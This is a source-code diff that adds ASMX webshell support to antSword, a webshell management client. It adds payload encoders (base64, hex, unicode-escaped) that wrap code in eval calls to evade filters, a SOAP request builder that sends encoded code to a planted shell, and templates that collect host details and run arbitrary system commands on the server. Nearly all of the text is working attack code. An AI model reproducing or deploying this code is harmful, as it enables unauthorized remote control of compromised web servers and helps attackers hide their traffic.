Shell support with the suffix of asmx added.

source/app.entry.js

@@ -168,7 +168,7 @@ const antSword = window.antSword = {
 };
 
 //核心模块类型列表
-antSword['core_types'] = ['asp', 'aspx', 'aspxcsharp', 'php', 'php4', 'phpraw', 'jsp', 'jspjs', 'cmdlinux', 'pswindows', 'custom'];
+antSword['core_types'] = ['asp', 'aspx', 'asmx', 'aspxcsharp', 'php', 'php4', 'phpraw', 'jsp', 'jspjs', 'cmdlinux', 'pswindows', 'custom'];
 
 // 加载核心模板
 antSword['core'] = require('./core/');

source/core/asmx/decoder/default.js

@@ -0,0 +1,14 @@
+/**
+ * aspx::default解码器
+ */
+
+'use strict';
+
+module.exports = {
+  asoutput: () => {
+    return ``.replace(/\n\s+/g, '');
+  },
+  decode_buff: (buff) => {
+    return buff;
+  }
+}

source/core/asmx/encoder/base64.js

@@ -0,0 +1,22 @@
+//
+// aspx::base64 编码模块
+//
+// :把除了密码的其他参数都base64编码一次
+//
+
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+  let randomID;
+  if (ext.opts.otherConf['use-random-variable'] === 1) {
+    randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+  } else {
+    randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+  }
+  data[randomID] = Buffer
+    .from(data['_'])
+    .toString('base64');
+  data[pwd] = `eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(Request.Item["${randomID}"])),"unsafe");`;
+  delete data['_'];
+  return data;
+}

source/core/asmx/encoder/hex.js

@@ -0,0 +1,26 @@
+//
+// aspx::hex 编码模块
+//
+// 把除了密码的其他参数都 hex 编码一次
+//
+
+'use strict';
+
+module.exports = (pwd, data, ext = null) => {
+    let randomID;
+    if (ext.opts.otherConf['use-random-variable'] === 1) {
+        randomID = antSword.utils.RandomChoice(antSword['RANDOMWORDS']);
+    } else {
+        randomID = `${antSword['utils'].RandomLowercase()}${Math.random().toString(16).substr(2)}`;
+    }
+    let hexencoder = "function HexAsciiConvert(hex:String) {var sb:System.Text.StringBuilder = new Sys" +
+        "tem.Text.StringBuilder();var i;for(i=0; i< hex.Length; i+=2){sb.Append(System.Co" +
+        "nvert.ToString(System.Convert.ToChar(Int32.Parse(hex.Substring(i,2), System.Glob" +
+        "alization.NumberStyles.HexNumber))));}return sb.ToString();};";
+    data[randomID] = Buffer
+        .from(data['_'])
+        .toString('hex');
+    data[pwd] = `${hexencoder};eval(HexAsciiConvert(Request.Item["${randomID}"]),"unsafe");`;
+    delete data['_'];
+    return data;
+}

source/core/asmx/encoder/url_unicode.js

@@ -0,0 +1,41 @@
+/**
+ * aspx::url_unicode 编码器
+ * 把字符转成 %uXXXX 形式
+ * eg: Re => %u0052%u0065
+ * Create at: 2023/09/07
+ */
+
+'use strict';
+
+function char2unicode(c) {
+  if (c.length != 1) {
+    return '';
+  }
+  let buff = Buffer.alloc(4, '0');
+  let hexstr = c
+    .charCodeAt()
+    .toString(16);
+  buff.write(hexstr, buff.length - hexstr.length, hexstr.length);
+  return "\\u" + buff.toString();
+}
+
+function string2unicode(str) {
+  var ret = "";
+  for (var i = 0; i < str.length; i++) {
+    ret += char2unicode(str[i]);
+  }
+  return ret;
+}
+
+/*
+ * @param  {String} pwd   连接密码
+ * @param  {Array}  data  编码器处理前的 payload 数组
+ * @return {Array}  data  编码器处理后的 payload 数组
+ */
+module.exports = (pwd, data, ext = {}) => {
+  data[pwd] = string2unicode(data['_']).replace(/\\u/g, 'asunescape(%)u');
+  // 删除 _ 原有的payload
+  delete data['_'];
+  // 返回编码器处理后的 payload 数组
+  return data;
+}

source/core/asmx/index.js

@@ -0,0 +1,104 @@
+/**
+ * ASMX服务端脚本模板
+ * 开写：2023/09/07
+ * 更新：-
+ * 作者：BaoGuo <https://github.com/ba0gu0>
+ */
+'use strict';
+
+// import Base from '../base';
+const Base = require('../base');
+
+class ASMX extends Base {
+  constructor(opts) {
+    opts['otherConf']['use-raw-body'] = 1
+    opts['httpConf']['headers']['content-type'] = 'text/xml; charset=utf-8'
+
+    super(opts);
+    // 解析模板
+    [
+      'base',
+      'command',
+      'filemanager',
+      'database/dsn',
+      'database/mysql',
+      'database/access',
+      'database/oracle',
+      'database/sqlserver',
+      'database/sqloledb_1',
+      'database/sqloledb_1_sspi',
+      'database/microsoft_jet_oledb_4_0'
+    ].map((_) => {
+      this.parseTemplate(`./asmx/template/${_}`);
+    });
+    // 解析编码器
+    this
+      .encoders
+      .map((_) => {
+        this.parseEncoder(`./asmx/encoder/${_}`);
+      });
+    this
+      .decoders
+      .map((_) => {
+        this.parseDecoder(`./asmx/decoder/${_}`);
+      });
+  }
+
+  /**
+   * 获取编码器列表
+   * @return {array} 编码器列表
+   */
+  get encoders() {
+    return ["base64", "hex", "url_unicode"];
+  }
+
+  get decoders() {
+    return ["default"];
+  }
+
+  /**
+   * HTTP请求数据组合函数
+   * @param  {Object} data 通过模板解析后的代码对象
+   * @return {Promise}     返回一个Promise操作对象
+   */
+  complete(data, force_default = false) {
+    // 分隔符号
+    let tag_s, tag_e;
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tags']) {
+      tag_s = this.__opts__['otherConf']['custom-datatag-tags'];
+    } else {
+      tag_s = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "->|";
+    }
+    if (this.__opts__['otherConf'].hasOwnProperty('use-custom-datatag') && this.__opts__['otherConf']['use-custom-datatag'] == 1 && this.__opts__['otherConf']['custom-datatag-tage']) {
+      tag_e = this.__opts__['otherConf']['custom-datatag-tage'];
+    } else {
+      tag_e = Math.random().toString(16).substr(2, parseInt(Math.random() * 8 + 5)); // "|<-";
+    }
+
+    // let formatter = new this.format(this.__opts__['encode']);
+    let formatter = Base
+      .prototype
+      .format(this.__opts__);
+
+    let aspxencode = this.__opts__['encode'];
+
+    switch (this.__opts__['encode']) {
+      case "UTF8":
+        aspxencode = "UTF-8";
+        break;
+      default:
+        break;
+    }
+    // 替换代码中的 GetEncoding("!{ANT::ENDOCE}").GetString 的 tag
+    data['_'] = data['_'].replace(/!{ANT::ENDOCE}/g, aspxencode);
+    // base64编码一次数据
+    let base64Code = formatter['base64'](data['_']);
+
+    data['_'] = `<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><Invoke xmlns="http://tempuri.org/"><${this.__opts__['pwd']}>Response.Write("${tag_s.substr(0,tag_s.length/2)}"+"${tag_s.substr(tag_s.length/2)}");var err:Exception;try{eval(System.Text.Encoding.GetEncoding("${aspxencode}").GetString(System.Convert.FromBase64String("${base64Code}")),"unsafe");}catch(err){Response.Write("ERROR:// "+err.message);}Response.Write("${tag_e.substr(0,tag_e.length/2)}"+"${tag_e.substr(tag_e.length/2)}");Response.End();</${this.__opts__['pwd']}></Invoke></soap:Body></soap:Envelope>`;
+
+    // 使用编码器进行处理并返回
+    return this.encodeComplete(tag_s, tag_e, data);
+  }
+}
+
+module.exports = ASMX;

source/core/asmx/template/base.js

@@ -0,0 +1,17 @@
+/**
+ * 基础信息模板
+ * ? 获取当前路径、盘符列表
+ */
+
+module.exports = () => ({
+  info: {
+    _: `var c=System.IO.Directory.GetLogicalDrives();Response.Write(Server.MapPath(".")+"\t");for(var i=0;i<=c.length-1;i++)Response.Write(c[i][0]+":");Response.Write("\t"+Environment.OSVersion+"\t");Response.Write(Environment.UserName);`
+  },
+  probedb: { // 检测数据库函数支持
+    _: `function fe(S:String){try{new ActiveXObject(S);return 1;}catch(Exception){return 0;}};
+    var n="Adodb.Connection|Adodb.RecordSet";
+    n=n.Split("|");
+    for(var i=0;i<n.length;i++)Response.Write(n[i]+"\\t"+fe(n[i])+"\\n");
+    `.replace(/\n\s+/g, '')
+  }
+})

source/core/asmx/template/command.js

@@ -0,0 +1,41 @@
+/**
+ * 命令执行模板
+ */
+
+module.exports = (arg1, arg2, arg3) => ({
+  exec: {
+    _: `var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::bin}".substr(#randomPrefix#))));
+    var e=new System.Diagnostics.Process();
+    var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+    c.UseShellExecute=false;
+    c.RedirectStandardOutput=true;
+    c.RedirectStandardError=true;
+    e.StartInfo=c;
+    c.Arguments="/c "+System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::cmd}".substr(#randomPrefix#)));
+    if("#{newbase64::env}".substr(#randomPrefix#)) {
+      var envstr = System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::env}".substr(#randomPrefix#)));
+      var envarr = envstr.split("|||asline|||");
+      var i;
+      for (var i in envarr) {
+        var ss = envarr[i].split("|||askey|||");
+        if (ss.length != 2) {
+          continue;
+        }
+        c.EnvironmentVariables.Add(ss[0],ss[1]);
+      }
+    }
+    e.Start();
+    out=e.StandardOutput;
+    EI=e.StandardError;
+    e.Close();
+    Response.Write(out.ReadToEnd() + EI.ReadToEnd());`.replace(/\n\s+/g, ''),
+  },
+  listcmd: {
+    _: `var binarr=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String("#{newbase64::binarr}".substr(#randomPrefix#)));
+      var ss=binarr.split(",");
+      var i;
+      for(var i in ss){
+        Response.Write(ss[i]+"\\t"+(System.IO.File.Exists(ss[i])?1:0)+"\\n");
+      }`.replace(/\n\s+/g, ''),
+  }
+})

source/core/asmx/template/database/dsn.js

@@ -0,0 +1,5 @@
+//
+// ASPX::DNS数据库驱动代码模板
+//
+
+module.exports = require('./default');

source/core/asmx/template/database/microsoft_jet_oledb_4_0.js

@@ -0,0 +1,5 @@
+//
+// ASPX::microsoft_jet_oledb_4_0数据库驱动代码模板
+//
+
+module.exports = require('./access');

source/core/asmx/template/database/mysql.js

@@ -0,0 +1,5 @@
+// 
+// ASPX::mysql数据库驱动代码模板
+// 
+
+module.exports = require('./default');